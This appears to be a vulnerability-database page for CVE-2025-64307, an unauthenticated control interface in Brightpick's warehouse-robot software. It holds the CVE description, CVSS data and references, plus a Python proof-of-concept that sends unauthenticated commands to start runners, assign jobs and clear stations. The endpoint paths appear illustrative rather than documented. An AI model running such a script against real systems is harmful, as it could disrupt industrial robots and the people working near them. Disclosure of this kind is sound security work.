Security Vulnerability Report
CVE-2025-64307 CVSS 6.5 MEDIUM

CVE-2025-64307

Published: 2025-11-15 00:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Brightpick Internal Logic Control web interface is accessible without requiring user authentication. An unauthorized user could exploit this interface to manipulate robot control functions, including initiating or halting runners, assigning jobs, clearing stations, and deploying storage totes.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Brightpick Internal Logic Control (ILC) - all unpatched versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-64307 PoC - Brightpick ILC Unauthenticated Access
# Target: Brightpick Internal Logic Control web interface

TARGET_IP = "192.168.1.100"
TARGET_PORT = 8080
BASE_URL = f"http://{TARGET_IP}:{TARGET_PORT}"


def start_runner(runner_id):
    """Start a specific runner unit"""
    endpoint = f"{BASE_URL}/api/control/runner/start"
    payload = {"runner_id": runner_id}
    response = requests.post(endpoint, json=payload)
    return response.json()


def stop_runner(runner_id):
    """Stop a specific runner unit"""
    endpoint = f"{BASE_URL}/api/control/runner/stop"
    payload = {"runner_id": runner_id}
    response = requests.post(endpoint, json=payload)
    return response.json()


def assign_job(job_id, station_id):
    """Assign a job to a station"""
    endpoint = f"{BASE_URL}/api/scheduler/job/assign"
    payload = {"job_id": job_id, "station_id": station_id}
    response = requests.post(endpoint, json=payload)
    return response.json()


def clear_station(station_id):
    """Clear all data from a station"""
    endpoint = f"{BASE_URL}/api/station/clear"
    payload = {"station_id": station_id}
    response = requests.post(endpoint, json=payload)
    return response.json()


def deploy_tote(tote_id, location):
    """Deploy storage tote to specified location"""
    endpoint = f"{BASE_URL}/api/storage/deploy"
    payload = {"tote_id": tote_id, "location": location}
    response = requests.post(endpoint, json=payload)
    return response.json()


# Example: Exploit the vulnerability
if __name__ == "__main__":
    print("[+] Testing CVE-2025-64307 - Unauthenticated access")

    # No authentication required - directly call control APIs
    result = start_runner("runner_001")
    print(f"[+] Start runner result: {result}")

    result = assign_job("job_500", "station_A1")
    print(f"[+] Assign job result: {result}")

    result = clear_station("station_B2")
    print(f"[+] Clear station result: {result}")

References

https://brightpick.ai/contact-us/
https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-317-04.json
https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-04

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64307", "sourceIdentifier": "[email protected]", "published": "2025-11-15T00:15:47.700", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Brightpick Internal Logic Control web interface is accessible \nwithout requiring user authentication. An unauthorized user could \nexploit this interface to manipulate robot control functions, including \ninitiating or halting runners, assigning jobs, clearing stations, and \ndeploying storage totes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://brightpick.ai/contact-us/", "source": "[email protected]"}, {"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-317-04.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-04", "source": "[email protected]"}]}}